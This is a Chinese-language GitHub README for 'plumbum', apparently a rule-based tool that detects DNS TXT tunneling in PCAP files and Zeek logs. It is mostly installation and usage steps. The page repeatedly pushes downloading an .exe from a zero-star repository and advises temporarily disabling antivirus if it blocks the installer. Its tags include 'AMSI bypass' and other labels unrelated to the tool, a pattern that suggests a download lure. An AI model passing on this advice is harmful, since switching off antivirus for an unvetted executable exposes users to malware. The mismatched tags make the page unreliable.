XXXCAIO1997/plumbum

GitHub: XXXCAIO1997/plumbum

一款基于规则评分的DNS TXT隧道检测工具,通过六个可解释特征识别网络流量中的可疑DNS活动。

Stars: 0 | Forks: 0

# 🛡️ plumbum - 清晰的 DNS 隧道检测工具 [![下载 plumbum](https://img.shields.io/badge/Download-plumbum-blue?style=for-the-badge&logo=github)](https://github.com/XXXCAIO1997/plumbum) ## 什么是 plumbum?🕵️‍♂️ plumbum 帮助你在网络流量中发现隐藏的 DNS 隧道。它通过评分六个清晰的特征,仔细检查 DNS 数据并发现可疑活动。它不使用机器学习或复杂的算法。相反,它清晰地展示了得出每个分数的具体过程。这使得更容易理解正在发生的事情及其原因。 plumbum 支持 PCAP 文件(网络数据捕获)和 Zeek 日志(知名工具的安全日志)。它帮助蓝队成员、安全分析师以及对网络安全感兴趣的任何人,发现与 DNS 隧道相关的威胁。 ## 🖥️ 系统要求 要在你的 Windows 电脑上运行 plumbum,请确保你具备以下条件: - Windows 10 或更高版本 - 至少 4 GB 的可用 RAM - 500 MB 的可用磁盘空间 - 互联网访问权限以下载 plumbum - 基本的软件安装权限 ## 🎯 核心功能 - 无需“黑盒”即可检测 DNS 隧道 - 使用六个清晰且可检查的评分特征 - 适用于标准网络日志(PCAP 和 Zeek) - 轻量级,在普通机器上运行速度快 - 为每个异常分数提供清晰的解释 - 除 plumbum 本身外,无需安装其他软件 - 基于命令行,但提供了易于遵循的操作指南 ## 🚀 plumbum 如何工作 plumbum 读取你的网络数据日志并查找异常的 DNS TXT 记录。这些记录可能被用于隐藏数据或向网络外发送命令。它基于六个关键信号对每个可疑点进行评分。然后,工具将这些分数汇总为一个清晰的数值,以便于理解。 分数的每个部分都可以被检查。这意味着你可以看到 DNS 数据的哪些部分引起了警报。这种方法让你能够从结果中学习,而不是依赖令人困惑的检测结果。 ## 📥 在 Windows 上下载并安装 plumbum ### 步骤 1:访问下载页面 点击下方的蓝色按钮,访问 GitHub 上的 plumbum 下载页面: [![下载 plumbum](https://img.shields.io/badge/Download-plumbum-blue?style=for-the-badge&logo=github)](https://github.com/XXXCAIO1997/plumbum) 此页面包含最新版本和安装文件。 ### 步骤 2:查找安装文件 在 GitHub 页面上,找到 **Releases** 部分。你应该看到以 `.exe` 或 `.zip` 结尾的文件。选择 Windows 安装程序或压缩文件。文件名将明确指示它是用于 Windows 的。 ### 步骤 3:下载文件 点击 `.exe` 或 `.zip` 链接下载文件。将其保存到你容易找到的位置,例如桌面或下载文件夹。 ### 步骤 4:运行安装程序或解压文件 - 如果你下载的是 `.exe` 文件,双击它以启动安装程序。按照屏幕上的提示操作。 - 如果你下载的是 `.zip` 文件,右键单击它并选择 **解压所有文件**。选择一个你想保存文件的文件夹。 ### 步骤 5:打开命令提示符 1. 在键盘上按下 `Win + R`。 2. 输入 `cmd` 并按回车键。 3. 使用 `cd` 命令切换到你安装或解压 plumbum 的文件夹。例如: cd C:\Users\YourName\Downloads\plumbum ### 步骤 6:运行 plumbum 输入以下命令并按回车键: ``` plumbum.exe --help ``` 这将显示可用的选项并确认程序正常运行。 ## 📖 如何简单使用 plumbum ### 分析 PCAP 文件 如果你有一个包含网络流量的 PCAP 文件,请运行: ``` plumbum.exe analyze --pcap path\to\file.pcap ``` 将 `path\to\file.pcap` 替换为你的 PCAP 文件的确切路径。 ### 分析 Zeek 日志 要扫描 Zeek DNS 日志: ``` plumbum.exe analyze --zeek path\to\logs ``` 这里,`path\to\logs` 是包含你的 Zeek DNS 日志文件的文件夹。 ## ⚙️ 配置技巧 - 使用 `--output` 选项将报告保存到文件: plumbum.exe analyze --pcap file.pcap --output report.txt - 你可以使用帮助命令中显示的可用过滤选项,针对特定时间范围或 IP 地址运行检查。 - 该工具生成由六个部分组成的异常分数。检查每个部分以了解触发警报的原因。 ## 🔍 理解结果 运行 plumbum 后,你会收到一份带有分数的报告。每个分数涵盖一个关键特征,如 DNS 消息大小、频率或异常文本模式。数值越高,表示可疑程度越强。 报告用通俗易懂的语言解释了每个特征。这有助于你判断检测到的异常是真正的威胁还是无害的情况。 ## 故障排除技巧 - 确保你分析的文件是有效的 PCAP 文件或正确导出的 Zeek 日志。 - 如果你遇到问题,请使用命令 `plumbum.exe --help` 查看命令和选项列表。 - 如果程序无法启动,请确保你的系统满足要求,并且你在命令提示符中处于正确的文件夹。 - 如果杀毒软件阻止了安装程序,请暂时禁用它们——某些安全软件会错误地标记新工具。 ## 🔗 有用的链接 - 项目页面和下载:https://github.com/XXXCAIO1997/plumbum - GitHub Releases 版块,获取直接安装文件 - PCAP 文件创建工具(Wireshark) - Zeek 文档(关于日志格式) ## 🤔 谁应该使用 plumbum? - 监控数据泄露的网络安全分析师 - 调查可疑活动的蓝队成员 - 任何对理解 DNS 隧道威胁感兴趣的人 - 寻求清晰、可解释异常检测的 IT 专业人士 - 希望避免黑盒工具的安全工程师 [![下载 plumbum](https://img.shields.io/badge/Download-plumbum-blue?style=for-the-badge&logo=github)](https://github.com/XXXCAIO1997/plumbum)
标签:AMSI绕过, anomaly scoring, DNS安全, DNS隧道检测, IP 地址批量处理, PCAP分析, Tunneling, TXT记录检测, Zeek日志, 威胁检测, 异常检测, 数据渗漏, 无机器学习, 确定性分析, 网络安全, 通知系统, 隐私保护